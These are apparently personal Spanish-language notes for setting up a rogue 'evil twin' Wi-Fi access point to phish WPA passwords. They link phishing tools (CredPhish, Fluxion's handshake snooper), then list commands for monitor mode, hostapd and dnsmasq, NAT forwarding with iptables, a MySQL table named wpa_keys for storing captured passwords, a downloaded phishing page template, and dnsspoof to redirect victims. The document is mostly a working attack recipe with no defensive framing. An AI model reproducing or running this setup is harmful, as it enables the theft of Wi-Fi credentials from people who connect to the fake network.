- https://github.com/tokyoneon/CredPhish
- https://github.com/m4ll0k/Atlas/blob/master/atlas.py
- https://github.com/FluxionNetwork/fluxion/wiki/Handshake-Snooper-Attack
NOTA:
Asignar ip a la tarjeta de red ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
Colocar la tarjeta en modo monitor:
airmon-ng start <IR>Para colocar de nuevo la tarjeta en modo normal:
airmon-ng stop <IR>Crear los dos archivos: * dnsmaq.conf * hostapd.conf
hostapd hostapd.conf
dnsmasq -C dnsmasq.conf -dPara hacer forwarding para que los paquetes pasen:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1Tambien debemos configurar el firewall:
# para ver las reglas
iptables -L
iptables --tables nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface <IR> -j ACCEPT
Habilitar forward de paquetes:
echo 1 > /proc/sys/net/ipv4/ip_forwardCreamos una base de datos para guardar todo:
service mysql start
mysql
create database apfake;
create user apfakeuser;
grant all on apfake.* to 'apfakeuser'@'localhost' identified by 'erik123';
use apfake;
create table wpa_keys(pass1 varchar(30), pass2 varchar(30));
alter database apfake character set 'utf8';
# Podemos consultar
select * from wpa_keys;Vamos a la ruta del servidor web (www/html), podemos el archivo que descargamos aqui: Descargar plantilla de aqui: https://www.shellvoide.com/media/files/rogueap.zip#
Haremos uso de dnsspoof:
dnsspoof -i <IR>Con esto tendremos todo creado.